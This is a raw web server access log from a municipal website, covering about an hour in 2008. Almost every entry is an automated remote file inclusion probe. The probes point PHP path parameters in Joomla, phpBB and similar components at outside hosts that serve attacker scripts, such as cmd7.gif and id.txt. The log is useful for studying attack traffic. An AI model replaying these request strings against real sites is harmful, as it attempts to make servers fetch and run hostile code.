74.54.42.146 - - [31/Aug/2008:23:34:24 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:34:24 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:34:29 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:34:36 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.54.42.146 - - [31/Aug/2008:23:34:36 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
211.239.162.41 - - [31/Aug/2008:23:35:55 -0700] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
212.227.65.79 - - [31/Aug/2008:23:37:41 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "cityofarkadelphia.com"
212.227.65.79 - - [31/Aug/2008:23:37:41 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:38:33 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:39:23 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:39:30 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.79.246.241 - - [31/Aug/2008:23:39:48 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
77.79.246.241 - - [31/Aug/2008:23:39:48 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
207.58.167.158 - - [31/Aug/2008:23:40:56 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
207.58.167.158 - - [31/Aug/2008:23:40:56 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
206.127.187.133 - - [31/Aug/2008:23:43:05 -0700] "GET /logs/access.log HTTP/1.0" 200 179162 "http://viagra-gl-pills.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "cityofarkadelphia.com"
212.227.65.79 - - [31/Aug/2008:23:43:14 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [31/Aug/2008:23:43:14 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [31/Aug/2008:23:43:14 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [31/Aug/2008:23:43:14 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dga-gaggenau.de/genussakademie/cms/cache/com_banners/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
211.233.36.126 - - [31/Aug/2008:23:43:34 -0700] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.233.36.126 - - [31/Aug/2008:23:43:34 -0700] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.indigonetzwerk.de/mambo/editor/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:23:43:35 -0700] "GET /logs/access_071201.log%20//newspublish/include.php?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [31/Aug/2008:23:44:33 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
61.19.158.41 - - [31/Aug/2008:23:45:31 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
61.19.158.41 - - [31/Aug/2008:23:45:32 -0700] "GET /logs/access.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
62.97.194.235 - - [31/Aug/2008:23:47:11 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://juninhor0x.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "cityofarkadelphia.com"
62.97.194.235 - - [31/Aug/2008:23:47:12 -0700] "GET /logs/access.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://juninhor0x.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "cityofarkadelphia.com"
62.97.194.235 - - [31/Aug/2008:23:47:12 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://juninhor0x.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:23:47:33 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:23:47:34 -0700] "GET ///vwar/backup/errors.php?error=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:23:47:34 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.myphotowebsite.com/bateman/photos/3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:23:48:04 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:23:48:04 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:23:48:04 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
85.13.230.130 - - [31/Aug/2008:23:49:30 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.myphotowebsite.com/bateman/photos/3/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:23:52:59 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:23:53:02 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:23:53:10 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
58.69.172.67 - - [31/Aug/2008:23:54:14 -0700] "GET /logs/access_080501.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:10:39 -0700] "GET /logs/access_080201.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:10:39 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:10:39 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
69.64.51.36 - - [01/Sep/2008:00:11:27 -0700] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
69.64.51.36 - - [01/Sep/2008:00:11:27 -0700] "GET ///bemarket/postscript/postscript.php?p_mode=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
69.64.51.36 - - [01/Sep/2008:00:11:27 -0700] "GET /logs/access.log///bemarket/postscript/postscript.php?p_mode=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:12:40 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:12:40 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:12:40 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:12:40 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:12:41 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:12:41 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:12:44 -0700] "GET /logs/access_071231.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:12:57 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:12:57 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dga-gaggenau.de/genussakademie/cms/cache/com_banners/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:12:57 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:12:57 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dga-gaggenau.de/genussakademie/cms/cache/com_banners/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:12:58 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
212.227.65.79 - - [01/Sep/2008:00:12:58 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dga-gaggenau.de/genussakademie/cms/cache/com_banners/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
69.64.34.172 - - [01/Sep/2008:00:13:42 -0700] "GET ///bemarket/postscript/postscript.php?p_mode=http://www.handowire.com/bbs/Paddy/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
193.110.89.6 - - [01/Sep/2008:00:14:23 -0700] "GET //config/dbutil.bck.php?confdir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
193.110.89.6 - - [01/Sep/2008:00:14:23 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
193.110.89.6 - - [01/Sep/2008:00:14:23 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
193.110.89.6 - - [01/Sep/2008:00:14:25 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.64.51.36 - - [01/Sep/2008:00:16:36 -0700] "GET /logs/access.log%20///bemarket/postscript/postscript.php?p_mode=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
189.62.145.42 - - [01/Sep/2008:00:18:27 -0700] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://juninhor0x.t35.com/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "cityofarkadelphia.com"
189.62.145.42 - - [01/Sep/2008:00:18:28 -0700] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://juninhor0x.t35.com/bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:19:31 -0700] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:19:33 -0700] "GET /logs/access_080101.log//skin/zero_vote/error.php?dir=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:19:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:19:37 -0700] "GET //skin/zero_vote/error.php?dir=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:00:21:03 -0700] "GET ///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 918 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:00:21:03 -0700] "GET /logs///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 4090 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:00:21:04 -0700] "GET /logs/access_080201.log///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:21:07 -0700] "GET /logs/access_080201.log//login.php?dir=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:21:07 -0700] "GET //login.php?dir=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [01/Sep/2008:00:21:07 -0700] "GET /logs//login.php?dir=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:21:08 -0700] "GET /logs/access_080201.log///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:21:08 -0700] "GET ///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 918 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:21:08 -0700] "GET /logs///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 4090 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:21:08 -0700] "GET /logs/access_080201.log///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:21:08 -0700] "GET /logs///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 4090 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:21:08 -0700] "GET ///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 918 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:00:21:52 -0700] "GET /logs/access_071101.log///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:22:11 -0700] "GET /logs/access_071101.log///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:22:51 -0700] "GET /logs/access_071101.log///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
78.41.19.131 - - [01/Sep/2008:00:22:56 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [01/Sep/2008:00:22:59 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [01/Sep/2008:00:23:06 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
208.80.193.27 - - [01/Sep/2008:00:23:47 -0700] "GET / HTTP/1.0" 200 901 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; libero; ImageShack Toolbar 3.0.3; ImageShack Toolbar 3.0.6)" "cityofarkadelphia.com"
213.198.11.243 - - [01/Sep/2008:00:26:08 -0700] "GET /convert/mvcw.php?vwar_root=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "cityofarkadelphia.com"
213.198.11.243 - - [01/Sep/2008:00:26:08 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:27:01 -0700] "GET /logs/access_080101.log///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [01/Sep/2008:00:27:21 -0700] "GET /logs/access_080101.log///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
78.41.19.131 - - [01/Sep/2008:00:27:28 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [01/Sep/2008:00:27:28 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [01/Sep/2008:00:27:35 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:00:27:52 -0700] "GET /logs/access_080101.log///?path[docroot]=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.6.22.119 - - [01/Sep/2008:00:28:01 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
74.6.22.119 - - [01/Sep/2008:00:28:01 -0700] "GET / HTTP/1.0" 200 901 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
212.34.170.6 - - [01/Sep/2008:00:28:28 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "cityofarkadelphia.com"
212.34.170.6 - - [01/Sep/2008:00:28:28 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "cityofarkadelphia.com"
83.133.96.246 - - [01/Sep/2008:00:29:09 -0700] "GET /logs/access_071231.log/errors.php?error=http://blueridgehost.com/events//tools/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.133.96.246 - - [01/Sep/2008:00:29:09 -0700] "GET /errors.php?error=http://blueridgehost.com/events//tools/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.133.96.246 - - [01/Sep/2008:00:29:10 -0700] "GET /logs/errors.php?error=http://blueridgehost.com/events//tools/idbaru.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
78.41.19.131 - - [01/Sep/2008:00:30:00 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [01/Sep/2008:00:30:00 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
78.41.19.131 - - [01/Sep/2008:00:30:09 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://216.12.192.109/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
